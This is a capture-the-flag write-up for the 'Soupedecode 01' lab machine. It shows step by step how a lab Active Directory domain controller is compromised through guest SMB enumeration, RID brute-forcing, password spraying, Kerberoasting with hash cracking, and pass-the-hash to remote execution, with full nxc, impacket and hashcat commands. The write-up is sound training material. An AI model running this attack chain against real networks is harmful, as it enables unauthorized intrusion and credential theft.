Soupedecode 01
Test your enumeration skills on this boot-to-root machine. - by josemlwdf
The following post by 0xb0b is licensed under CC BY 4.0
Recon
We start with a Nmap scan, which revealed multiple services typical of an Active Directory environment, including DNS (53), Kerberos (88, 464), SMB (445), LDAP (389, 636), Global Catalog services (3268, 3269), and MSRPC/NetBIOS (135, 139). Additional services such as Remote Desktop Protocol (3389), Active Directory Web Services (9389), and a range of high-numbered ephemeral ports (49664–49793) commonly used for DCOM and RPC communication were also observed.
nmap -p- soupdecode01.thm -Pn
We perform a default script scan and version scan on the ports and can determine the domain name and FQDN, which we add to our /etc/hosts file:
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,9389,49664,49666,49675,49711,49793 soupdecode01.thm -Pn
dc01.soupdecode.local, soupdecode.localAccess To SMB as Guest
Since we have SMB available, we start enumerating it with NetExec (formerly CrackMapExec). It is an enumeration tool used for assessing and interacting with SMB and other network services. We use the built-in guest account and an empty password for an initial enumeration.
Initial connectivity was verified with the guest account without a password.
nxc smb soupdecode.local -u guest -p ''
We are able to connect as guest. We then list the available shares for the guest account. This confirmed that the IPC$ share was readable
nxc smb soupdecode.local -u guest -p '' --shares
To further enumerate domain users, we perform a RID brute-force, since the IPC$ share is readable.
nxc smb soupdecode.local -u guest -p '' --rid
We craft a users list with the follwing command. With this user list we could try kerberoasting or bruteforcing the accounts.
grep 'SOUPEDECODE\\' rid_brute.txt | cut -d':' -f2- | sed -E 's/.*SOUPEDECODE\\(.*) \(SidType.*/\1/' | grep -v '\$' > usernames.txt
Access To SMB as ybob317
First, we attempting to enumerate SMB shares on the soupdecode.local domain using the nxc smb tool with a list of usernames (and the same list as passwords), skipping brute-force (will only try credentials as exact username-password pairs from the list) and continuing enumeration even if valid credentials are found. We are able to spot valid credentials for ybob317.
nxc smb soupdecode.local -u usernames.txt -p usernames.txt --no-brute --continue-on-success
We try to enumerate the shares and see we are able to read the Users directory.
nxc smb soupdecode.local -u 'ybob317' -p 'REDACTED' --shares
We connect to the share...
smbclient //soupdecode.local/Users -U ybob317
... and are able to spot the users.txt in \ybob317\Desktop.
Kerberoasting - Access as file_svc
With the valid credentials we could try some Kerberoasting. We are able to retrieve some hashes.
impacket-GetUserSPNs soupedecode.local/ybob317:REDACTED-dc-ip 10.10.205.165 -request -output hashes.txt
Which of the hash from file_svc is crackable.
hashcat -a0 -m13100 hashes.txt /usr/share/wordlists/rockyou.txt --show
We use the credentials of file_svc to enumerate the shares, and see that we are now able to read the backup share.
nxc smb soupdecode.local -u 'file_svc' -p 'REDACTED' --shares
Pass-the-Hash - Access as FileServer$
Next, we retrieve the content of the backup share.
smbclient //soupdecode.local/backup -U file_svc
This share contains some NTLM hashes.
First, we retrive the users from the list.
cat backup_extract.txt | cut -d ':' -f 1 > extracted_users.txt
To extract just the NTLM hashes (the fourth field) from our backup_extract.txt file using cut, we can use the follwing command:
cut -d: -f4 backup_extract.txt > ntlm-hashes.txtWe pass the hashes and find a valid hash for FileServer$.
nxc smb soupdecode.local -u extracted_users.txt -H ntlm-hashes.txt --no-brute
Next, we use Smbexec to execute remote commands over SMB. We have sufficient access rights to access C:Users\Adminstrator\Desktop, where we find the root flag root.txt.
impacket-smbexec 'FileServer$'@soupdecode.local -hashes ':REDACTED'
Last updated
Was this helpful?